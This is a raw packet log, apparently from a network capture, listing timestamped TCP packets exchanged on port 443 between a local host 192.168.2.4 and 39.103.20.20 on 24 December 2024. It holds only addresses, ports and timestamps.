Dec 24, 2024 15:12:34.342797995 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.342935085 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.343547106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.343588114 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.343616009 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.343621016 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.343630075 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.343646049 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.343673944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.343700886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.343707085 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.343729973 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.343847990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.344438076 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344477892 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344502926 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.344508886 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344518900 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344535112 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.344553947 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344592094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344592094 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.344604015 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.344620943 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.344650984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.344650984 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.345371962 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.345410109 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.345436096 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.345442057 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.345453024 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.345470905 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.345487118 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.345510960 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.345518112 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.345544100 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.345582962 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.346116066 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346296072 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346324921 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.346329927 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346340895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346357107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.346375942 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346400023 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.346405983 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346415997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.346442938 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.347126007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.347151995 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.347156048 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.347166061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.347183943 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.347249985 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.347278118 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.347281933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.347290993 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.347311020 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.347342014 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.347342014 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.348025084 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348253012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348288059 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.348289967 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348299980 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348320007 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.348434925 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348463058 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.348469019 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348479033 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348496914 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.348510981 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348539114 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.348546982 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.348572969 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349149942 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349179029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349184036 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349212885 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349256992 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349355936 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349386930 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349391937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349402905 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349420071 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349456072 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349456072 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.349472046 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.349551916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.350209951 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350263119 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350291014 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.350298882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350308895 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350325108 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.350342989 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350368977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.350374937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350383997 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.350403070 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.351514101 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351541996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.351548910 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351557970 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351577044 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.351613045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.351613045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.351617098 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351689100 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351717949 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351720095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.351727962 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.351744890 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.352344990 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.352374077 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.352381945 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.352408886 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.352492094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.352511883 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.352518082 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.352526903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.352544069 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.353121996 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.353152037 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.353158951 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.353183985 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.353549957 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.354023933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.355679989 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.355706930 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.355714083 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.355741978 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.357414961 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.357553959 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.357559919 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.358700037 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.360922098 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.360953093 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.360960007 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.360990047 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.361551046 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.361816883 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.363347054 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.363374949 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.363380909 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.363405943 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.365065098 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.365554094 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.365561008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.366468906 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.369591951 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.381652117 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.381660938 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.383630037 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.401657104 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.401662111 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.401696920 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.401705980 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.401832104 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.401832104 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.401842117 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.401854992 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.405558109 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.460882902 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.462023020 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.462182999 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.462189913 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.462230921 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.463709116 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.463820934 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.463828087 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.463876963 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.464793921 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.466618061 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.466664076 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.466670990 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.466737986 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.468218088 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.468250990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.468257904 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.468298912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.469645977 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.469870090 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.470721960 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.470757008 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.470762968 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.470803976 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.472481966 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.472570896 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.472577095 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.472630978 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.474261045 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.475084066 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.475130081 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.475138903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.475222111 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.476047993 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.476916075 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.478750944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.478787899 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.478795052 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.478851080 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.479479074 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.481364012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.481420040 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.481426954 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.481470108 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.481564045 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.482897043 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.483613014 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.484494925 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.485929012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.485966921 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.485974073 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.486018896 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.487297058 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.488147974 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.488198996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.488207102 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.488241911 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.489214897 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.489953995 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.491679907 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.491791010 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.492512941 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.492547035 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.492553949 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.492583990 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.495162964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.495932102 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.495939016 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.496006012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.498583078 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.498589039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.500943899 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.525017023 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.525404930 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.526040077 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.527606964 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.527637959 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.527645111 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.527677059 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.529373884 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.529459953 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.529467106 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.529503107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.530339003 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.531604052 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.531610012 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.532136917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.533885002 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.533931017 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.533936977 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.534019947 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.534704924 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.534742117 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.534748077 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.534780025 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.536401033 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.537456989 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.537463903 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.538208008 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.539628029 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.539665937 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.539673090 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.539717913 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.539938927 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.540572882 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.542213917 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.542270899 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.542277098 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.542313099 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.544009924 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.544044018 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.544049978 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.544080019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.549530029 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.553570986 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.563872099 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.565367937 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.565543890 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.565551043 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.565561056 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.573468924 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.580529928 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.581406116 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.581445932 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.581454039 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.582854986 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.582935095 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.582946062 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.584500074 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.585472107 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.585479021 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.588511944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.589351892 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.589474916 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.589482069 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.589535952 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.589584112 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.667968988 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.669126987 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.669275999 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.669286013 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.669325113 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.670226097 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.670274019 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.670280933 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.670319080 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.671485901 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.672704935 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.672749996 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.672756910 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.672792912 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.673557997 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.674150944 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.674887896 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.674917936 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.674926043 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.674957037 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.676074982 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.676736116 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.676743031 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.677431107 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.678162098 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.678221941 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.678229094 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.678284883 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.681580067 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.716777086 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.717622042 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.718023062 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.718657017 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.718704939 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.718713045 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.718746901 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.719428062 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.720288992 CET	443	49740	39.103.20.20	192.168.2.4
Dec 24, 2024 15:12:34.720326900 CET	49740	443	192.168.2.4	39.103.20.20
Dec 24, 2024 15:12:34.720335007 CET	443	49740	39.103.20.20	192.168.2.4
